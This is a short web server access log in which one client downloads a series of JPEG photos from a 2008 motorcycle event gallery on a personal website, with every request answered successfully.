134.253.26.4 - - [23/Jul/2008:09:27:03 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_226M.JPG HTTP/1.0" 200 283691 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:04 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_253M.JPG HTTP/1.0" 200 214316 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:05 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_268M.JPG HTTP/1.0" 200 249991 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:06 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_274M.JPG HTTP/1.0" 200 294364 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:06 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_27M.JPG HTTP/1.0" 200 143663 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:06 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_29M.JPG HTTP/1.0" 200 123831 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:07 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_31M.JPG HTTP/1.0" 200 128598 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:07 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_390M.JPG HTTP/1.0" 200 258861 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
134.253.26.4 - - [23/Jul/2008:09:27:08 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/WeSTOC_2008_391M.JPG HTTP/1.0" 200 295175 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.dmulk.com"
